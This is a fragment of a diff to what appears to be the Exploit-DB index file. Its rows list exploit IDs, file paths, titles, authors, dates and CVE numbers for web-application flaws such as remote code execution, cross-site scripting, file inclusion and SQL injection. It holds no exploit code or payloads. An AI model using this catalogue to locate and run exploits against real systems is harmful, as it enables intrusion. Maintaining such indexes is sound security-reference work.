48639,exploits/multiple/webapps/48639.txt,"RSA IG&L Aveksa 7.1.1 - Remote Code Execution",2020-07-06,"Jakub Palaczynski",webapps,multiple,,2020-07-06,2020-07-06,0,CVE-2019-3759,,,,,
49254,exploits/multiple/webapps/49254.txt,"Rumble Mail Server 0.51.3135 - 'domain and path' Stored XSS",2020-12-14,"Mohammed Alshehri",webapps,multiple,,2020-12-14,2020-12-14,0,,,,,,
@ -14156,7 +14162,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
27104,exploits/php/webapps/27104.txt,"aoblogger 2.3 - URL BBcode Cross-Site Scripting",2006-01-17,"Aliaksandr Hartsuyeu",webapps,php,,2006-01-17,2013-07-26,1,CVE-2006-0310;OSVDB-22526,,,,,https://www.securityfocus.com/bid/16286/info
20866,exploits/php/webapps/20866.txt,"aoop CMS 0.3.6 - Multiple Vulnerabilities",2012-08-27,"Julien Ahrens",webapps,php,,2012-08-27,2012-08-27,0,OSVDB-85265;OSVDB-85264,,,,http://www.exploit-db.comaoop_0.3.6_minimal.rar,http://security.inshell.net/advisory/23
12721,exploits/php/webapps/12721.txt,"Apache Axis2 1.4.1 - Local File Inclusion",2010-05-24,HC,webapps,php,,2010-05-23,2011-02-15,1,OSVDB-59001,,,,,
52010,exploits/php/webapps/52010.py,"Apache mod_proxy_cluster - Stored XSS",2024-05-13,"Mohamed Mounir Boudjema",webapps,php,,2024-05-13,2024-05-13,0,,,,,,
52010,exploits/php/webapps/52010.py,"Apache mod_proxy_cluster 1.2.6 - Stored XSS",2024-05-13,"Mohamed Mounir Boudjema",webapps,php,,2024-05-13,2025-04-05,0,CVE-2023-6710,,,,,
12330,exploits/php/webapps/12330.txt,"Apache OFBiz - Multiple Cross-Site Scripting Vulnerabilities",2010-04-21,"Lucas Apa",webapps,php,,2010-04-20,,1,CVE-2010-0432;OSVDB-64522;OSVDB-64521;OSVDB-64520;OSVDB-64519;OSVDB-64518;OSVDB-64517;OSVDB-64516,,,,,http://www.bonsai-sec.com/research/vulnerabilities/apacheofbiz-multiple-xss-0103.php
42520,exploits/php/webapps/42520.txt,"Apache2Triad 1.5.4 - Multiple Vulnerabilities",2017-08-21,hyp3rlinx,webapps,php,,2017-08-21,2017-08-21,0,CVE-2017-12971;CVE-2017-12970;CVE-2017-12965,,,,,
5471,exploits/php/webapps/5471.txt,"Apartment Search Script - 'listtest.php' SQL Injection",2008-04-19,Crackers_Child,webapps,php,,2008-04-18,2016-11-24,1,OSVDB-44533;CVE-2008-1919,,,,,

Can't render this file because it is too large.